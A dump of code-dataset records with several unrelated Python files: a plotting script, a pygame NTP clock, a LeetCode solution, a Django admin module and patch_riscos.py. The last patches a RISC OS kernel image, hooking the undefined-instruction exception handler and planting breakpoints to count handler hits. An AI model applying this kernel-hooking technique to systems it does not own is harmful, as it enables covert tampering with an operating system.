index=False)\n","sub_path":"rawdata.py","file_name":"rawdata.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"262895258","text":"import os\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport matplotlib.patches as 
mpatches\n\nstyle.use('fivethirtyeight')\nfig = plt.figure()\nplt2 = plt.twinx()\nax = fig.add_subplot(1,1,1)\nax2 = fig.add_subplot(1,1,1)\n\n\ndef animate(i):\n xs = []\n ys = []\n zs = []\n es = []\n ss = []\n\n plt.clf()\n\n plt.xlabel('Episode')\n plt.ylabel('steps')\n\n #plt2.ylabel('Reward')\n\n graph_data = open(os.getcwd() + '\\graph.cache', 'r')\n\n index = mpatches.Patch( linewidth=0.5, label='Q-Learning α=0.8, γ=0.75, ε=0.9')\n plt.legend(handles=[index])\n\n for line in graph_data.readlines():\n if len(line) > 1:\n line = line.strip()\n x, y, z, e, s = line.split(',')\n xs.insert(len(xs), int(x))\n ys.insert(len(ys), int(y))\n zs.insert(len(zs), float(z))\n es.insert(len(es), float(e))\n ss.insert(len(ss), int(s))\n plt.plot(xs, ys, linewidth=1) # steps\n #plt.plot(xs, zs, linewidth=1) # rewards\n #plt.plot(xs, es, linewidth=1) # epsilon\n\nanimate(1)\nplt.show()","sub_path":"Exchange-RL-Agent/tool/States.pyw","file_name":"States.pyw","file_ext":"pyw","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"216094934","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport time\nimport logging\n\nimport pygame\nfrom pygame.locals import *\n\n# from PySide2 import QtCore, QtGui, QtWidgets\n\n\nfrom ntp import NTPClient\nimport process_mon\n\n\nNTP_SERVER_LIST = [\n \"ntp.nict.jp\"\n # , \"ntp.jst.mfeed.ad.jp\"\n # , \"time.cloudflare.com\"\n , \"time.google.com\"\n # , \"ats1.e-timing.ne.jp\"\n # , \"s2csntp.miz.nao.ac.jp\"\n]\n\nTIMEZONE = +9\n\nIS_FULLSCREEN = True\nFRAME_RATE = 20\nSCREEN_WIDTH = 1920\nSCREEN_HEIGHT = 1080\n\nCOLOR_BG = 0x394552\nCOLOR_FONT = 0xE1EBF5\nCOLOR_BOLD = 0xF7665C\nCOLOR_INFO = 0xB4C43B\n\n\ndef main():\n logging.basicConfig(level=logging.DEBUG)\n\n process_monitor = process_mon.ProcessMonitor()\n\n ntp_client = NTPClient(NTP_SERVER_LIST, TIMEZONE)\n ntp_client.sync()\n\n pygame.init()\n\n # Initialize screen\n display_info = pygame.display.Info()\n screen_bitsize = display_info.bitsize\n scrreen_width = display_info.current_w\n scrreen_height = display_info.current_h\n\n display_driver = pygame.display.get_driver()\n\n logging.info(f\"Pygame: display_driver={display_driver}\")\n # print(display_info)\n\n screen_flags = pygame.DOUBLEBUF\n if IS_FULLSCREEN:\n screen_flags |= pygame.FULLSCREEN | pygame.HWSURFACE\n else:\n screen_flags |= pygame.RESIZABLE\n\n screen = pygame.display.set_mode((scrreen_width, scrreen_height), screen_flags, screen_bitsize)\n screen_2 = pygame.display.set_mode((scrreen_width, scrreen_height), screen_flags, screen_bitsize)\n pygame.display.set_caption(\"NTPClock\")\n\n clock = pygame.time.Clock()\n\n # Initialize fonts\n main_date_font = pygame.font.SysFont(None, 190)\n main_clock_font = pygame.font.SysFont(None, 320)\n main_sec_font = pygame.font.SysFont(None, 240)\n fps_font = pygame.font.SysFont(None, 64)\n\n accumulation_fps = []\n avg_fps = 0.0\n fps = 0.0\n one_sec_timer = time.time()\n last_sync_time = time.time()\n\n process_monitor.start()\n\n while True:\n if time.time() - last_sync_time > 3600.0:\n ntp_client.sync()\n\n # 時刻レンダリング\n frame_start_time = time.time()\n\n current_dt = ntp_client.get_datetime()\n\n current_date_str = current_dt.strftime(\"%Y/%m/%d(%a)\")\n current_clock_str = current_dt.strftime(\"%H:%M\")\n current_sec_str = f\"{current_dt.second:02d}.{str(current_dt.microsecond)[0:1]}\"\n\n main_date_render = main_date_font.render(current_date_str, False, get_rgb(COLOR_FONT))\n main_clock_render = 
main_clock_font.render(current_clock_str, False, get_rgb(COLOR_FONT))\n main_sec_render = main_sec_font.render(current_sec_str, False, get_rgb(COLOR_FONT))\n\n main_date_size_w, main_date_size_h = main_date_font.size(current_date_str)\n main_clock_size_w, main_clock_size_h = main_clock_font.size(current_clock_str)\n main_sec_size_w, main_sec_size_h = main_sec_font.size(current_sec_str)\n\n\n # FPSレンダリング\n fps_render = fps_font.render(f\"{avg_fps:.02f} FPS\", False, get_rgb(0x00FF00))\n\n # ================================================================\n # イベント処理\n # ================================================================\n for event in pygame.event.get(): # 終了処理\n if event.type == pygame.QUIT:\n pygame.quit()\n os._exit(0)\n\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.locals.K_ESCAPE:\n pygame.quit()\n os._exit(0)\n\n # ================================================================\n # Draw\n # ================================================================\n screen.fill(get_rgb(COLOR_BG))\n\n screen.blit(main_date_render, (int(scrreen_height - (main_date_size_w / 2)), 80))\n screen.blit(main_clock_render, (int(scrreen_height - (main_clock_size_w / 2) - (main_sec_size_w / 2) - 16), scrreen_height / 2 - 60))\n screen.blit(main_sec_render, (int(scrreen_height - (main_sec_size_w / 2) + (main_clock_size_w / 2) + 16), (scrreen_height / 2 - 60) + main_clock_size_h - main_sec_size_h))\n\n screen.blit(fps_render, (5, 5))\n\n pygame.display.flip()\n\n\n # ================================================================\n # FPS計測\n # ================================================================\n frame_time = time.time() - frame_start_time\n\n fps = 1.0 / (frame_time)\n accumulation_fps.append(fps)\n\n if time.time() - one_sec_timer > 1.0:\n one_sec_timer = time.time()\n if len(accumulation_fps):\n avg_fps = sum(accumulation_fps) / len(accumulation_fps)\n\n # pygame.display.set_caption(f\"NTPClock [FPS: {fps:.02f}, Avg.: {avg_fps:.02f}]\")\n\n # ================================================================\n # VSYNC\n # ================================================================\n vsync_wait = 1.0 / FRAME_RATE\n\n if vsync_wait > frame_time:\n time.sleep(vsync_wait - frame_time)\n\n time.sleep(0.05)\n\n process_monitor.process_message()\n\n\ndef get_rgb(hex):\n r = hex >> 16 & 0xFF\n g = hex >> 8 & 0xFF\n b = hex >> 0 & 0xFF\n return (r, g, b)\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"246924659","text":"#!/usr/bin/python3\n\nimport vm\nimport re\nimport os\nimport sys\nos.environ['LIBCAPSTONE_PATH'] = os.path.join(os.path.dirname(__file__), \"capstone\")\n\nimport keystone.bindings.python.keystone as keystone\nimport capstone.bindings.python.capstone as capstone\n\n# however, kernel image on Raspberry Pi is stripped-header raw image, we lost all the relocation info (virtual address mapping).\n# The good part is we have a complete physical memory dump and register info. 
Thus, we can recover the memory mapping by re-walking the page table.\n\n\n# https://www.riscosopen.org/wiki/documentation/show/HAL%20OS%20layout%20and%20headers\n# /Source/Kernel/hdr/OSEntries\n# RISC OS rom image format:\n# 0 ~ 0x10000 HAL\n# 0x10000 OS image base\n\n# Regards to the Risc OS source code syntax, Ref: http://www.riscos.com/support/developers/asm/index.html\n# And also: https://www.riscosopen.org/wiki/documentation/show/A%20BASIC%20guide%20to%20ObjAsm\n\n# NOTE: Risc OS overrides undefined instruction vector for floating point instruction emulation at a later stage of bootstrap\n# the location of instrumentation (`breakpoints`) should be chosen carefully, so that the time when breakpoints are reached,\n# the undefined instruction vector should be already patched to the FPE (floating point emulation) handler\n# also NOTE: that conditional flag bits might also affected, so should not instrument at `tst`, `cmp` instructions etc.\n\n\ndef patching(raw, offset, patch, addr=0):\n encoding, count = ks.asm(patch.encode(), addr)\n print([hex(c) for c in encoding])\n print(len(encoding))\n print(count)\n origin_bytes = raw[offset:offset+len(encoding)]\n print(origin_bytes)\n return (encoding, origin_bytes)\n\ndef b2pat(bstr):\n return b\"\".join([\"\\\\x{:02x}\".format(c).encode('latin-1') for c in bstr])\n\ndef align(va, alignment=4):\n ra = (va+alignment-1)&(~(alignment-1))\n return ra, ra-va\n\n\n# e.g. `./patch_riscos.py riscpi.reg riscpi.mem RISCOS.IMG 0x30000000 new.img`\nif len(sys.argv) < 5:\n print(\"Usage: patch.py [reg file] [mem dump] [kernel img] [min log storage vaddr]\")\n sys.exit()\n\nkernel_base = int(sys.argv[4], 16)\nprint(\"kernel base: \", hex(kernel_base))\nwith open(sys.argv[3], 'rb') as fd:\n kernel_data = fd.read()\nmm = vm.VM(sys.argv[1], sys.argv[2])\nvma = mm.walk()\n\ncs = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM|capstone.CS_MODE_LITTLE_ENDIAN)\n\nund_off = 4\nund_va = None\nmain_patch_vaddr = None\nmain_patch_off = None\nmain_patch_size = 0\nstorage_vaddr = None\nstorage_size = 0\nfor va, pa, sz, prot in vma:\n if va == 0xffff0000:\n excp_vec = mm._read(pa, 0x20)\n for i in cs.disasm(excp_vec, 0):\n print(i)\n #print(hex(mm._read_word(mm.translate(0xffff0018+8+0x418))))\n #for i in cs.disasm(mm._read(mm.translate(0xfc012900), 0x20), 0xfc012900):\n # print(i)\n #sys.exit()\n i = next(cs.disasm(excp_vec[4:8], va + und_off)) # entry for _und\n print(i, hex(pa))\n if (i.mnemonic == \"b\"): # Linux\n und_va = int(i.op_str[1:], 16)\n possible_patch = [m.start() for m in re.finditer(excp_vec, kernel_data)]\n assert(len(possible_patch) == 1)\n elif (i.mnemonic == \"ldr\"): # RiscPi\n print(i.op_str)\n op = re.search(\"pc, \\[pc, #(0x[0-9a-fA-F]+)\\]\", i.op_str).group(1)\n print(op)\n und_va = mm._read_word(mm.translate(i.address+8+int(op,16)))\n print(hex(und_va))\n und_va = mm._read_word(pa+i.address-va+8+int(op,16))\n print(\"addr: \", hex(und_va), hex(mm.translate(und_va)))\n i = next(cs.disasm(mm._read(mm.translate(und_va), 4), und_va))\n print (\" => \", i)\n assert (i.mnemonic == \"ldr\")\n op = re.search(\"pc, \\[pc, #(0x[0-9a-fA-F]+)\\]\", i.op_str).group(1)\n print(op)\n und_va = mm._read_word(mm.translate(i.address)+8+int(op,16))\n print(\"addr: \", hex(und_va), hex(mm.translate(und_va)))\n i = next(cs.disasm(mm._read(mm.translate(und_va), 4), und_va))\n print (\" ==> \", i)\n assert (i.mnemonic == \"ldr\")\n op = re.search(\"pc, \\[pc, #((0x)?[\\-0-9a-fA-F]+)\\]\", i.op_str).group(1)\n print(op)\n assert (\"0x\" not in op)\n und_va = 
mm._read_word(mm.translate(i.address)+8+int(op))\n print(\"addr: \", hex(und_va), hex(mm.translate(und_va)))\n if prot.check_exec() and va > kernel_base:\n page = mm._read(pa, sz)\n for nullpad in re.finditer(b\"(\\xff+)\", page):\n # bid for the largest null padding\n if len(nullpad.group()) > 0x100 and main_patch_size < len(nullpad.group()):\n print(\"exec: \", [hex(va+x) for x in nullpad.span()])\n sig = mm._read(pa, nullpad.start())\n koff = kernel_data.find(sig)\n print(len(sig))\n print(hex(koff))\n if len(sig) > 0 and koff != -1:\n main_patch_off, adj = align(koff+nullpad.start())\n main_patch_size = len(nullpad.group()) - adj\n main_patch_vaddr = va+nullpad.start() + adj\n # hopefully, something safe\n if prot.check_write() and va > kernel_base and ((va^kernel_base)>>24) == 0:\n page = mm._read(pa, sz)\n for nullpad in re.finditer(b\"(\\x00+)\", page):\n if len(nullpad.group()) > 0x100 and storage_size < len(nullpad.group()):\n print(\"data: \", [hex(va+x) for x in nullpad.span()])\n storage_vaddr, adj = align(va+nullpad.start())\n storage_size = len(nullpad.group()) - adj\n\nassert(und_va)\n# RiscOS: va -> pa -> kernel img offset\n# 0xfc000000 0x3bb00000 0\n# 0xfc4f3b30 0x3bff3b30 0x4f3b30 : End of ROM Image (\\xff) padding (for 2/4/6/8 MB alignment)\nprint(\"patch exec: \", hex(main_patch_vaddr), hex(mm.translate(main_patch_vaddr)))\n\n# Find initial und handler to patch a trampline\nund_handle = None\nund_off = mm.translate(und_va)\nprint(hex(und_off))\nsig = mm._read(und_off, 0x1000)\nfor i in cs.disasm(sig, und_va):\n print (i)\n # check when overwrites pc\n if i.op_str.startswith(\"pc,\"):\n sig = sig[:i.address-und_va+i.size]\n break\n\nund_kernimg_off = None\nfor match in re.finditer(b2pat(sig), kernel_data):\n print([hex(x) for x in match.span()])\n assert (not und_kernimg_off)\n und_kernimg_off = match.start()\nassert(und_kernimg_off)\nprint(hex(und_kernimg_off))\n\n#sys.exit()\n\n# Start patching\npatchset = {}\nks = keystone.Ks(keystone.KS_ARCH_ARM, keystone.KS_MODE_ARM|keystone.KS_MODE_LITTLE_ENDIAN)\n\n# Define breakpoints\n# REed: iDev_GPU_Timer1, iDev_GPU_VCDMA2, iDev_GPU_DMA4, iDev_GPU_DMA5, iDev_GPU_DMA8, iDev_GPU_DMA9, iDev_GPU_DMA10, iDev_GPU_DMA11_14(shared irq), iDev_GPU_HostPort, iDev_GPU_SMI, iDev_GPU_SDIO, iDev_GPU_Uart, iDev_ARM_Timer, iDev_ARM_Mbx, iDev_ARM_DBell0\nbreakpoints = [0xfc012ce0, 0x20049dbc, 0x20049e2c, 0x20049e9c, 0x20049f0c, 0x20049f7c, 0x20049fec, 0x2004a1ac, 0xfc207944, 0xfc2356c4, 0x200a38f4, 0xfc30742c, 0xfc2358b8, 0xfc1f58bc, 0xfc225910]\n# Dummy: IRQ\nbreakpoints.append(0xfc012c34)\n\noldbytes = []\nfor bp in breakpoints:\n kern_off = None\n off = mm.translate(bp)\n print(hex(off))\n sig = mm._read(off, 0x20)\n\n # Fixing for Linux, avoid `bl __gnu_mcount_nc`, which is dynamically patched to `ldm sp!, {lr}` in memory dump\n for i in cs.disasm(sig, bp):\n print(i)\n if i.mnemonic == \"ldm\" and i.op_str == \"sp!, {lr}\":\n sig = sig[:i.address-bp]\n break\n\n print(b2pat(sig))\n for match in re.finditer(b2pat(sig), kernel_data):\n print(\" >\", hex(bp), \" : \", [hex(x) for x in match.span()])\n # page offset should match with the virtual address\n if match.start()&mm.page_mask(bp) == bp&mm.page_mask(bp) or \\\n (0x8000+match.start())&mm.page_mask(bp) == bp&mm.page_mask(bp): # Raspi kernel base might starts at 0x8000\n assert (not kern_off) # should have only one match\n kern_off = match.start()\n # some might not be aligned (e.g. 
RiscOS)\n if not kern_off:\n for match in re.finditer(b2pat(sig), kernel_data):\n print(\" >>\", hex(bp), \" : \", [hex(x) for x in match.span()])\n assert (not kern_off)\n kern_off = match.start()\n\n assert (kern_off) # should find the match now\n oldbytes.append(\",\".join([hex(c) for c in kernel_data[kern_off:kern_off+4]]))\n print(\"DEBUG\")\n print(oldbytes[-1])\n print(kernel_data[kern_off:kern_off+4])\n patchset[kern_off] = patching(kernel_data, kern_off, \".word 0xe7fddef1\")\n #patchset[kern_off+4] = patching(kernel_data, kern_off+4, \"b $.;\")\n\n#sys.exit()\n\n# Patch und excp stub\n# patch excp_und dispatch table: __und_svc\n#patch_off = vector_base_off + 4\n#patchset[patch_off] = patching(binary_data, patch_off, \"b $+{}\".format(0x12c0))\n#patch_off = vector_base_off + 0x11d4 # __und_svc vector\n#patchset[patch_off] = patching(kernel_data, patch_off, \".word {}\".format(hex(main_patch_vaddr)))\npatch_off = und_kernimg_off\npatchset[patch_off] = patching(kernel_data, patch_off,\n #\"b $.;\"\n #\"stmdb sp!, {{r0-r3}};\"\n #\"mrc p15, 0, r0, c1, c0, 0;\"\n #\"tst r0, #1;\"\n \"ldr pc, $.Ldispat;\"\n \".Ldispat:\"\n \".word {DISPATCH_VADDR};\".format(\n DISPATCH_VADDR=hex(main_patch_vaddr),\n DISPATCH_PADDR=hex(mm.translate(main_patch_vaddr)),\n ), und_va)\ntramp_orig_bytes = patchset[patch_off][1]\ntramp_orig_rest = und_va + len(tramp_orig_bytes)\n\n#print(hex(und_va))\n#print(hex(und_kernimg_off))\n#sys.exit()\n\n# Patch main dispatcher\npatch_off = main_patch_off\npatchset[patch_off] = patching(kernel_data, patch_off,\n #\"mrs r0, cpsr;\"\n #\"eor r0, r0, #8;\"\n ##\"orr r0, r0, #c0;\" # keep irq disabled or redisable irq\n #\"msr spsr_cxsf, r0;\"\n #\"adr r0, .Lhandle;\"\n #\"movs pc, r0;\" # get back to UND mode\n #\".Lhandle:\"\n #\"ldr r0, [sp, #8];\" # restore r0, lr, spsr\n #\"msr spsr_cxsf, r0;\"\n #\"ldmia sp, {{r0, lr}};\"\n\n \"stmdb sp!, {{r0-r3}};\"\n #\"mrs r0, spsr;\"\n #\"and r0, r0, #0x1f;\" # check mode for those without independent SPSR\n #\"teq r0, #0x10;\" # skip user\n #\"beq .Lund;\"\n #\"teq r0, #0x1f;\" # skip system\n #\"beq .Lund;\"\n\n \"adr r0, .Lbp;\" # verify breakpoints\n \"ldr r1, $.Lstat;\"\n \"sub r2, r2, r2;\"\n\n \".Lloop:\"\n \"ldr r3, [r0, r2, LSL#2];\"\n \"adds r3, r3, #0;\" # - check end of list (breakpoints)\n \"beq .Lund;\"\n \"add r3, r3, #4;\" # (assume arm mode, lr will be the next inst after the breakpoint) check thumb?\n \"teq r3, lr;\" # - check breakpoint match\n \"beq .Lupdate;\"\n \"add r2, r2, #1;\"\n \"b .Lloop;\"\n\n \".Lupdate:\" # update hit counter\n \"add r3, r1, r2, LSL#2;\"\n \".Lretrylog:\"\n \"ldrex r1, [r3];\"\n \"add r1, r1, #1;\"\n \"strex r0, r1, [r3];\" # check failed?\n \"tst r0, r0;\"\n \"bne .Lretrylog;\"\n\n \"ldr r0, $.Lstorage;\"\n \"mrc p15, 0, r1, c0, c0, 5;\" # read MPIDR to get core number\n \"and r1, r1, #15;\"\n \"add r0, r0, r1, LSL#2;\"\n \".Lretrystub:\"\n \"ldrex r3, [r0];\"\n \"strex r3, lr, [r0];\" # store return address, check cpu id?\n \"tst r3, r3;\"\n \"bne .Lretrystub;\"\n \"adr lr, .Lstub;\" # start restore\n \"add lr, lr, r2, LSL#3;\"# find stub (@r2: bp index)\n \"ldmia sp!, {{r0-r3}};\"\n \"movs pc, lr;\" # trigger context switch\n\n \".Lrestore:\" # restore original control flow\n \"sub sp, sp, #4;\"\n \"stmdb sp, {{r0-r1}};\"\n \"ldr r0, $.Lstorage;\"\n \"mrc p15, 0, r1, c0, c0, 5;\" # read MPIDR to get core number\n \"and r1, r1, #15;\"\n \"add r0, r0, r1, LSL#2;\"\n \"ldrex r0, [r0];\" # atomic load\n \"clrex;\" # clear execution monitor\n #\"sub r4, r4, r4; ldr r4, [r4];\" # 
page fault debug\n \"str r0, [sp];\"\n \"ldmdb sp, {{r0-r1}};\"\n \"ldmia sp!, {{pc}};\"\n\n \".Lund:\" # und faulting - have to restore the original und_excp handler here\n \"ldmia sp!, {{r0-r3}};\" # Linux init proc invokes und inst on boot, probably breakpoint setup\n \".byte {ORIG_UND_VEC};\"\n \"ldr pc, [pc, #-4];\"\n \".word {ORIG_UND_REST};\"\n \"b $.;\"\n\n \".Lstub:\" # stub for the original inst replaced by breakpoint\n #\"mov r12, sp;\" # NOTE: at this point the only register got messed up is PC (r15),\n #\"b .Lrestore;\" # be careful with PC relative load/store/branch etc.\n \"{STUB}\"\n \".Lstorage:\" # storage of lr reg for context switch, no worry if original inst mess up with registers\n \".word {LR_STORAGE};\" # - one should make sure there are enough space (one reg_size(4 bytes) for each cpu core)\n \".Lstat:\" # address to store stat info\n \".word {STAT_STORAGE};\" # - space requirement: 4 bytes per breakpoints\n \".Lbp:\" # null-ended list of breakpoint address\n \".word {BREAKPOINTS};\"\n \".word 0;\".format(\n ORIG_UND_VEC=\",\".join([hex(c) for c in tramp_orig_bytes]),\n ORIG_UND_REST=hex(tramp_orig_rest),\n LR_STORAGE=hex(storage_vaddr),\n STAT_STORAGE=hex(storage_vaddr+0x10),\n BREAKPOINTS=\",\".join([hex(p) for p in breakpoints]),\n STUB=\"\".join([\".byte {};b .Lrestore;\".format(b) for b in oldbytes])\n )\n , main_patch_vaddr)\n\n\n# Second round, We've only patched VFP emulation, Now to patch the default UNDEF\nund_va = 0xfc028fe4 # Found through JTAG: mdw 0xffff0120\nmain_patch_vaddr += 0x400 # Another dispatcher\nmain_patch_off += 0x400\nund_handle = None\nund_off = mm.translate(und_va)\nprint(hex(und_off))\nsig = mm._read(und_off, 0x1000)\nfor i in cs.disasm(sig, und_va):\n print (i)\n # check when overwrites pc\n if i.op_str.startswith(\"pc,\"):\n sig = sig[:i.address-und_va+i.size]\n break\n\nund_kernimg_off = None\nfor match in re.finditer(b2pat(sig), kernel_data):\n print([hex(x) for x in match.span()])\n assert (not und_kernimg_off)\n und_kernimg_off = match.start()\nassert(und_kernimg_off)\nprint(hex(und_kernimg_off))\n\npatch_off = und_kernimg_off\npatchset[patch_off] = patching(kernel_data, patch_off,\n #\"b $.;\"\n #\"stmdb sp!, {{r0-r3}};\"\n #\"mrc p15, 0, r0, c1, c0, 0;\"\n #\"tst r0, #1;\"\n \"ldr pc, $.Ldispat;\"\n \".Ldispat:\"\n \".word {DISPATCH_VADDR};\".format(\n DISPATCH_VADDR=hex(main_patch_vaddr),\n DISPATCH_PADDR=hex(mm.translate(main_patch_vaddr)),\n ), und_va)\ntramp_orig_bytes = patchset[patch_off][1]\ntramp_orig_rest = und_va + len(tramp_orig_bytes)\n\npatch_off = main_patch_off\npatchset[patch_off] = patching(kernel_data, patch_off,\n \"stmdb sp!, {{r0-r3}};\"\n\n \"adr r0, .Lbp;\" # verify breakpoints\n \"sub r2, r2, r2;\"\n\n \".Lloop:\"\n \"ldr r3, [r0, r2, LSL#2];\"\n \"adds r3, r3, #0;\" # - check end of list (breakpoints)\n \"beq .Lund;\"\n \"add r3, r3, #4;\" # (assume arm mode, lr will be the next inst after the breakpoint) check thumb?\n \"teq r3, lr;\" # - check breakpoint match\n \"beq .Lupdate;\"\n \"add r2, r2, #1;\"\n \"b .Lloop;\"\n\n \".Lupdate:\" # update hit counter\n\n \"adr lr, .Lstub;\" # start restore\n \"add lr, lr, r2, LSL#4;\"# find stub (@r2: bp index)\n \"ldmia sp!, {{r0-r3}};\"\n \"movs pc, lr;\" # trigger context switch\n\n \".Lund:\" # und faulting - have to restore the original und_excp handler here\n \"ldmia sp!, {{r0-r3}};\" # Linux init proc invokes und inst on boot, probably breakpoint setup\n \".byte {ORIG_UND_VEC};\"\n \"ldr pc, [pc, #-4];\"\n \".word {ORIG_UND_REST};\"\n \"b $.;\"\n\n 
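# each 8-byte stub below replays the one instruction displaced by a breakpoint and then branches to .Lrestore; the dispatcher indexes this table by the breakpoint number held in r2\n 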
\".Lstub:\" # stub for the original inst replaced by breakpoint\n #\"mov r12, sp;\" # NOTE: at this point the only register got messed up is PC (r15),\n #\"ldr pc, [pc, #-4];\" # be careful with PC relative load/store/branch etc.\n #\".word {BP Return Addr};\"\n #\"b $.;\"\n \"{STUB}\"\n \".Lbp:\" # null-ended list of breakpoint address\n \".word {BREAKPOINTS};\"\n \".word 0;\".format(\n ORIG_UND_VEC=\",\".join([hex(c) for c in tramp_orig_bytes]),\n ORIG_UND_REST=hex(tramp_orig_rest),\n BREAKPOINTS=\",\".join([hex(p) for p in breakpoints]),\n STUB=\"\".join([\".byte {};ldr pc, [pc, #-4];.word {};b $.;\".format(b,r+4) for b,r in zip(oldbytes,breakpoints)])\n )\n , main_patch_vaddr)\n\n\n\n\n# All Done, now output\nprint(\"storage address: \", hex(storage_vaddr))\n\nif len(sys.argv) > 5:\n with open(sys.argv[5], 'wb') as fd:\n data = kernel_data\n for off, patch in patchset.items():\n data = data[:off] + bytes(patch[0]) + data[off+len(patch[0]):]\n fd.write(data)\n","sub_path":"patch_riscos.py","file_name":"patch_riscos.py","file_ext":"py","file_size_in_byte":17311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"524820528","text":"class Movie():\n \"\"\"A simple class to store movie information.\n\n :type title: : str\n :param title: Title of the movie\n\n :type poster_image_url: :str\n :param poster_image_url: URL of desired movie poster or image.\n\n :type trailer_youtube_url: str\n :param trailer_youtube_url: YouTube URL of movie trailer.\n\n :type release_date: str\n :param release_date: Year of movie release.\n \"\"\"\n\n def __init__(self, title, poster_image_url, trailer_youtube_url, release_date):\n self.title = title\n self.poster_image_url = poster_image_url\n self.trailer_youtube_url = trailer_youtube_url\n self.release_date = release_date\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"259462712","text":"# https://www.jiuzhang.com/solutions/continuous-subarray-sum#tag-highlight-lang-python\nclass Solution:\n def checkSubarraySum(self, nums: List[int], k: int) -> bool:\n return self.dp_bottomup(nums, k)\n\n def dp_bottomup(self, nums, k):\n # O(N^2), O(N)\n if len(nums) < 2:\n return False\n\n n = len(nums)\n dp = [0] * n\n dp[0] = nums[0]\n for i in range(1, n):\n dp[i] = dp[i - 1] + nums[i]\n\n for i in range(n):\n for j in range(i + 1, n):\n val = dp[j] - dp[i] + nums[i]\n if k != 0:\n if val // k * k == val:\n return True\n elif val == k:\n return True\n return False\n","sub_path":"leetcode/lc523_Continuous_Subarray_Sum.py","file_name":"lc523_Continuous_Subarray_Sum.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"321114156","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nspinMultiplicity = 2\n\nenergy = {\n\t'CCSD(T)-F12/cc-pVTZ-F12': MolproLog('TSN12_f12.out'),\n}\n\nfrequencies = GaussianLog('ts12-freq.log')\n\nrotors = [HinderedRotor(scanLog=GaussianLog('83methyl_scan.log'), pivots=[4,6], top=[6,7,8,9], symmetry=3, fit='best'),]\n","sub_path":"data/quantum/ts/gAlkoxyIsom/TS.py","file_name":"TS.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"425613127","text":"from __future__ import absolute_import, division, generators, nested_scopes, print_function, unicode_literals, 
with_statement\n\nfrom django import forms\nfrom django.conf.urls import url as urls_url\nfrom django.contrib import admin\nfrom django.contrib.admin import helpers\nfrom django.contrib.admin.templatetags.admin_list import _boolean_icon\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Count, Sum\nfrom django.shortcuts import get_object_or_404, render_to_response\nfrom django.template import RequestContext\nfrom django.utils.encoding import smart_text\nfrom django.utils.functional import cached_property\nfrom django.utils.html import format_html\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom ..conf import settings\nfrom ..forms.clubs import ClubRegistrationAdminForm, ClubJournalEntryAdminForm, ClubJournalLeaderEntryAdminForm\nfrom ..models import *\nfrom ..utils import currency, comma_separated\n\nfrom .export import AdminExportMixin\nfrom .filters import SchoolYearListFilter, ClubListFilter, LeaderListFilter\n\n\nclass ClubGroupAdmin(admin.ModelAdmin):\n list_display = ('name', 'order')\n list_editable = ('order',)\n\n\n\nclass ClubTimeInlineAdmin(admin.TabularInline):\n model = ClubTime\n extra = 0\n\nclass ClubPeriodInlineAdmin(admin.TabularInline):\n model = ClubPeriod\n extra = 0\n ordering = ('start',)\n\nclass ClubAttachmentInlineAdmin(admin.TabularInline):\n model = ClubAttachment\n extra = 3\n\nclass ClubAdmin(AdminExportMixin, admin.ModelAdmin):\n list_display = (\n 'name', 'get_groups_list', 'get_leaders_list',\n 'get_times_list', 'get_periods_list',\n 'place', 'public', 'reg_active',\n 'get_registrations_link', 'get_journal_link', 'icon', 'note',\n )\n list_editable = ('public', 'reg_active', 'note')\n list_filter = (\n ('school_year', SchoolYearListFilter),\n 'age_groups',\n 'groups',\n ('leaders', LeaderListFilter),\n )\n inlines = (\n ClubTimeInlineAdmin,\n ClubPeriodInlineAdmin,\n ClubAttachmentInlineAdmin,\n )\n filter_horizontal = ('age_groups', 'groups', 'leaders')\n actions = (\n 'publish', 'unpublish',\n 'allow_registration', 'disallow_registration',\n 'merge',\n )\n search_fields = ('name', 'description')\n save_as = True\n\n def get_queryset(self, request):\n return super(ClubAdmin, self).get_queryset(request)\\\n .annotate(registrations_count=Count('registrations'))\n\n def get_form(self, request, obj=None, **kwargs):\n form = super(ClubAdmin, self).get_form(request, obj, **kwargs)\n if obj:\n school_year = obj.school_year\n else:\n school_year = request.school_year\n leaders_choices = form.base_fields['leaders'].widget.widget.choices\n leaders_choices.queryset = leaders_choices.queryset.filter(school_years = school_year)\n form.base_fields['leaders'].choices = leaders_choices\n return form\n\n def publish(self, request, queryset):\n Club.objects.filter(id__in=[reg['id'] for reg in queryset.values('id')]).update(public = True)\n self.message_user(request, _('Selected clubs were published.'))\n publish.short_description = _('Publish selected clubs')\n\n def unpublish(self, request, queryset):\n Club.objects.filter(id__in=[reg['id'] for reg in queryset.values('id')]).update(public = False)\n self.message_user(request, _('Selected clubs were unpublished.'))\n unpublish.short_description = _('Unpublish selected clubs')\n\n def allow_registration(self, request, queryset):\n Club.objects.filter(id__in=[reg['id'] for reg in queryset.values('id')]).update(reg_active = True)\n self.message_user(request, _('Registration was allowed for selected clubs.'))\n 
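# short_description (set below) becomes the label Django shows for this action in the admin dropdown\n 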
